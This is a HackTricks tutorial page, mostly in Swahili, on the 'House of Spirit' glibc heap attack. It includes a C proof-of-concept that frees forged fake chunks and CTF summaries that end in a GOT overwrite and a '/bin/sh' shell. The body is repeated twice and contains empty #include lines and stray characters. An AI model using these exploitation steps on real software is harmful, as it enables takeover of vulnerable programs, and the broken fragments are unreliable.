House of Spirit

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Taarifa za Msingi

Kanuni

House of Spirit

```c #include #include #include #include

// Code altered to add som prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit

struct fast_chunk { size_t prev_size; size_t size; struct fast_chunk *fd; struct fast_chunk *bk; char buf[0x20]; // chunk falls in fastbin size range };

int main() { struct fast_chunk fake_chunks[2]; // Two chunks in consecutive memory void *ptr, *victim;

ptr = malloc(0x30);

printf("Original alloc address: %p\n", ptr); printf("Main fake chunk:%p\n", &fake_chunks[0]); printf("Second fake chunk for size: %p\n", &fake_chunks[1]);

// Passes size check of "free(): invalid size" fake_chunks[0].size = sizeof(struct fast_chunk);

// Passes "free(): invalid next size (fast)" fake_chunks[1].size = sizeof(struct fast_chunk);

// Attacker overwrites a pointer that is about to be 'freed' // Point to .fd as it's the start of the content of the chunk ptr = (void *)&fake_chunks[0].fd;

free(ptr);

victim = malloc(0x30); printf("Victim: %p\n", victim);

return 0; }

</details>

### Lengo

* Kuwa na uwezo wa kuongeza kwenye tcache / fast bin an address ili baadaye iwezekane kuipatia

### Mahitaji

* Shambulio hili linahitaji mshambuliaji kuwa na uwezo wa kuunda couple ya chunks za haraka za uwongo zikionyesha kwa usahihi thamani ya ukubwa wake na kisha kuwa na uwezo wa kuachilia chunk ya kwanza ya uwongo ili iingie kwenye bin.

### Shambulio

* Unda chunks za uwongo ambazo zinapita ukaguzi wa usalama: utahitaji chunks 2 za uwongo k基本 kuonyesha katika nafasi sahihi ukubwa sahihi
* Kwa namna fulani, fanikisha kuachilia chunk ya kwanza ya uwongo ili iingie kwenye fast au tcache bin na kisha ipewe ili kuandika anwani hiyo

**Msimbo kutoka** [**guyinatuxedo**](https://guyinatuxedo.github.io/39-house\_of\_spirit/house\_spirit\_exp/index.html) **ni mzuri kuelewa shambulio.** Ingawa muundo huu kutoka kwa msimbo unaufupisha vizuri:
```c
/*
this will be the structure of our two fake chunks:
assuming that you compiled it for x64

+-------+---------------------+------+
| 0x00: | Chunk # 0 prev size | 0x00 |
+-------+---------------------+------+
| 0x08: | Chunk # 0 size      | 0x60 |
+-------+---------------------+------+
| 0x10: | Chunk # 0 content   | 0x00 |
+-------+---------------------+------+
| 0x60: | Chunk # 1 prev size | 0x00 |
+-------+---------------------+------+
| 0x68: | Chunk # 1 size      | 0x40 |
+-------+---------------------+------+
| 0x70: | Chunk # 1 content   | 0x00 |
+-------+---------------------+------+

for what we are doing the prev size values don't matter too much
the important thing is the size values of the heap headers for our fake chunks
*/

Kumbuka kwamba ni muhimu kuunda kipande cha pili ili kupita baadhi ya ukaguzi wa akili.

Mifano

CTF https://guyinatuxedo.github.io/39-house_of_spirit/hacklu14_oreo/index.html
Libc infoleak: Kupitia overflow inawezekana kubadilisha pointer ili kuelekeza kwenye anwani ya GOT ili kuvuja anwani ya libc kupitia kitendo cha kusoma cha CTF
House of Spirit: Kutumia hesabu inayohesabu idadi ya "rifles" inawezekana kuzalisha saizi bandia ya kipande cha kwanza bandia, kisha kutumia "message" inawezekana kuficha saizi ya pili ya kipande na hatimaye kutumia overflow inawezekana kubadilisha pointer ambayo itakombolewa ili kipande chetu cha kwanza bandia kikombolewe. Kisha, tunaweza kuki allocate na ndani yake kutakuwa na anwani ya mahali ambapo "message" inahifadhiwa. Kisha, inawezekana kufanya hii kuelekeza kwenye kiingilio cha scanf ndani ya jedwali la GOT, ili tuweze kuandika tena na anwani ya system. Wakati scanf inaitwa tena, tunaweza kutuma ingizo "/bin/sh" na kupata shell.
Gloater. HTB Cyber Apocalypse CTF 2024
Glibc leak: Buffer ya stack isiyoanzishwa.
House of Spirit: Tunaweza kubadilisha index ya kwanza ya array ya kimataifa ya pointers za heap. Kwa mabadiliko ya byte moja, tunatumia free kwenye kipande bandia ndani ya kipande halali, ili tupate hali ya vipande vinavyovuka baada ya kuki allocate tena. Kwa hiyo, shambulio rahisi la Tcache poisoning linafanya kazi kupata primitive ya kuandika isiyo na mipaka.

Marejeo

https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit

Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

PreviousOff by one overflow NextHouse of Lore | Small bin Attack

Last updated 4 days ago

Taarifa za Msingi

Kanuni

House of Spirit

```c #include #include #include #include

// Code altered to add som prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit

struct fast_chunk { size_t prev_size; size_t size; struct fast_chunk *fd; struct fast_chunk *bk; char buf[0x20]; // chunk falls in fastbin size range };

int main() { struct fast_chunk fake_chunks[2]; // Two chunks in consecutive memory void *ptr, *victim;

ptr = malloc(0x30);

printf("Original alloc address: %p\n", ptr); printf("Main fake chunk:%p\n", &fake_chunks[0]); printf("Second fake chunk for size: %p\n", &fake_chunks[1]);

// Passes size check of "free(): invalid size" fake_chunks[0].size = sizeof(struct fast_chunk);

// Passes "free(): invalid next size (fast)" fake_chunks[1].size = sizeof(struct fast_chunk);

// Attacker overwrites a pointer that is about to be 'freed' // Point to .fd as it's the start of the content of the chunk ptr = (void *)&fake_chunks[0].fd;

free(ptr);

victim = malloc(0x30); printf("Victim: %p\n", victim);

return 0; }

</details>

### Lengo

* Kuwa na uwezo wa kuongeza kwenye tcache / fast bin an address ili baadaye iwezekane kuipatia

### Mahitaji

* Shambulio hili linahitaji mshambuliaji kuwa na uwezo wa kuunda couple ya chunks za haraka za uwongo zikionyesha kwa usahihi thamani ya ukubwa wake na kisha kuwa na uwezo wa kuachilia chunk ya kwanza ya uwongo ili iingie kwenye bin.

### Shambulio

* Unda chunks za uwongo ambazo zinapita ukaguzi wa usalama: utahitaji chunks 2 za uwongo k基本 kuonyesha katika nafasi sahihi ukubwa sahihi
* Kwa namna fulani, fanikisha kuachilia chunk ya kwanza ya uwongo ili iingie kwenye fast au tcache bin na kisha ipewe ili kuandika anwani hiyo

**Msimbo kutoka** [**guyinatuxedo**](https://guyinatuxedo.github.io/39-house\_of\_spirit/house\_spirit\_exp/index.html) **ni mzuri kuelewa shambulio.** Ingawa muundo huu kutoka kwa msimbo unaufupisha vizuri:
```c
/*
this will be the structure of our two fake chunks:
assuming that you compiled it for x64

+-------+---------------------+------+
| 0x00: | Chunk # 0 prev size | 0x00 |
+-------+---------------------+------+
| 0x08: | Chunk # 0 size      | 0x60 |
+-------+---------------------+------+
| 0x10: | Chunk # 0 content   | 0x00 |
+-------+---------------------+------+
| 0x60: | Chunk # 1 prev size | 0x00 |
+-------+---------------------+------+
| 0x68: | Chunk # 1 size      | 0x40 |
+-------+---------------------+------+
| 0x70: | Chunk # 1 content   | 0x00 |
+-------+---------------------+------+

for what we are doing the prev size values don't matter too much
the important thing is the size values of the heap headers for our fake chunks
*/

Kumbuka kwamba ni muhimu kuunda kipande cha pili ili kupita baadhi ya ukaguzi wa akili.

Mifano

CTF https://guyinatuxedo.github.io/39-house_of_spirit/hacklu14_oreo/index.html
Libc infoleak: Kupitia overflow inawezekana kubadilisha pointer ili kuelekeza kwenye anwani ya GOT ili kuvuja anwani ya libc kupitia kitendo cha kusoma cha CTF
House of Spirit: Kutumia hesabu inayohesabu idadi ya "rifles" inawezekana kuzalisha saizi bandia ya kipande cha kwanza bandia, kisha kutumia "message" inawezekana kuficha saizi ya pili ya kipande na hatimaye kutumia overflow inawezekana kubadilisha pointer ambayo itakombolewa ili kipande chetu cha kwanza bandia kikombolewe. Kisha, tunaweza kuki allocate na ndani yake kutakuwa na anwani ya mahali ambapo "message" inahifadhiwa. Kisha, inawezekana kufanya hii kuelekeza kwenye kiingilio cha scanf ndani ya jedwali la GOT, ili tuweze kuandika tena na anwani ya system. Wakati scanf inaitwa tena, tunaweza kutuma ingizo "/bin/sh" na kupata shell.
Gloater. HTB Cyber Apocalypse CTF 2024
Glibc leak: Buffer ya stack isiyoanzishwa.
House of Spirit: Tunaweza kubadilisha index ya kwanza ya array ya kimataifa ya pointers za heap. Kwa mabadiliko ya byte moja, tunatumia free kwenye kipande bandia ndani ya kipande halali, ili tupate hali ya vipande vinavyovuka baada ya kuki allocate tena. Kwa hiyo, shambulio rahisi la Tcache poisoning linafanya kazi kupata primitive ya kuandika isiyo na mipaka.

Marejeo

https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit

Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)